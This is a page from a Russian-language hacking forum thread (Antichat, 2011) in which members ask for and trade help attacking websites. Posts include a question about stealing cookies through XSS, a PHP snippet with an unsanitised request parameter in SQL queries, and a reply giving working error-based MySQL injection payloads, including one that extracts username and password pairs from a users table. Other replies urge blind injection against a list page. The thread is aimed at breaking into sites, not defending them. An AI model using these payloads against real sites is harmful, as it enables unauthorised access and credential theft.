HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1601 из 2422 « Первая < 6011101150115511591 1597 1598 1599 1600 1601 1602 1603 1604 1605 1611165117012101 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.02.2011, 10:47
Dare
Новичок
Регистрация: 26.04.2010
Сообщений: 26
С нами: 8444531

Репутация: 53
По умолчанию
Да шанс есть, попробуй крутить как слепую.
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 12.02.2011, 17:14
boortyhuhtyu
Постоянный
Регистрация: 02.02.2011
Сообщений: 727
С нами: 8039126

Репутация: -6


По умолчанию
.......

Цитата:
Сообщение от None  
Доступ к денверу из локалки
 
Ответить с цитированием

  #3  
Старый 12.02.2011, 17:28
-=Razor=-
Новичок
Регистрация: 20.12.2008
Сообщений: 24
С нами: 9152742

Репутация: 62
По умолчанию
Цитата:
Сообщение от boortyhuhtyu  
есть сайт в локальной сети и есть активная xss можно ли перехватывать куки с локального хостинга например денвер и какие ещё есьт варианты?
Доступ к денверу из локалки
 
Ответить с цитированием

  #4  
Старый 13.02.2011, 14:36
rootmd
Участник форума
Регистрация: 09.12.2010
Сообщений: 101
С нами: 8118326

Репутация: -5
По умолчанию
Есть sql injection. трабла в том что в скрипте 2 запросы к бд. Если ставить "union+select+1" то ошибка "the used select statements have a different nubmer of columns", a если ставить "union+select+1,2,3.." то такая же ошибка только теперь у первого запроса.

Вот код:

Код:
$requestid = $_GET[requestid];

$res2 = mysql_query("select count(addedrequests.id) from addedrequests inner join users on addedrequests.userid = users.id inner join requests on addedrequests.requestid = requests.id WHERE addedrequests.requestid =$requestid") or die(mysql_error());
$row = mysql_fetch_array($res2);
$count = $row[0];

$res = mysql_query("select users.id as userid,users.username, users.downloaded,users.uploaded, requests.id as requestid, requests.request from addedrequests inner join users on addedrequests.userid = users.id inner join requests on addedrequests.requestid = requests.id WHERE addedrequests.requestid =$requestid $limit") or sqlerr();
 
Ответить с цитированием

  #5  
Старый 13.02.2011, 14:40
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию
Вывод через ошибку:

(1)and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--

либо так (select*from(select name_const(version(),1),name_const(version(),1))a)
 
Ответить с цитированием

  #6  
Старый 13.02.2011, 14:52
rootmd
Участник форума
Регистрация: 09.12.2010
Сообщений: 101
С нами: 8118326

Репутация: -5
По умолчанию
спасибки, работало, но как можно например не "from information_schema.tables" a "from users where id='1'"?
 
Ответить с цитированием

  #7  
Старый 13.02.2011, 15:00
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию
вместо version() прописываешь например (select concat(username,0x3a,password) from users limit 0,1)
 
Ответить с цитированием

  #8  
Старый 13.02.2011, 15:32
rootmd
Участник форума
Регистрация: 09.12.2010
Сообщений: 101
С нами: 8118326

Репутация: -5
По умолчанию
спасибо. но есть еше такой;

list.php?page=444444444444444444444444444444444

Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '6.66666666667E+33,15' at line 1
можно что-то замутить или иреально?
 
Ответить с цитированием

  #9  
Старый 13.02.2011, 21:27
boortyhuhtyu
Постоянный
Регистрация: 02.02.2011
Сообщений: 727
С нами: 8039126

Репутация: -6


По умолчанию
что можно зделать с путями с открытыми на серваке?

/images/spacer.gif

/icons/

/mail/

/robots.txt

/webmail/

/changelog.txt
 
Ответить с цитированием

  #10  
Старый 13.02.2011, 21:28
DCrypt
Новичок
Регистрация: 21.01.2010
Сообщений: 0
С нами: 8580980

Репутация: 0
По умолчанию
Цитата:
Сообщение от boortyhuhtyu  
что можно зделать с путями с открытыми на серваке?
/images/spacer.gif
/icons/
/mail/
/robots.txt
/webmail/
/changelog.txt
Ничего.

Цитата:
Сообщение от rootmd  
спасибо. но есть еше такой;
list.php?page=444444444444444444444444444444444
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '6.66666666667E+33,15' at line 1
можно что-то замутить или иреально?
Крути.
 
Ответить с цитированием
Ответ
Страница 1601 из 2422 « Первая < 6011101150115511591 1597 1598 1599 1600 1601 1602 1603 1604 1605 1611165117012101 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка

Загрузка чата...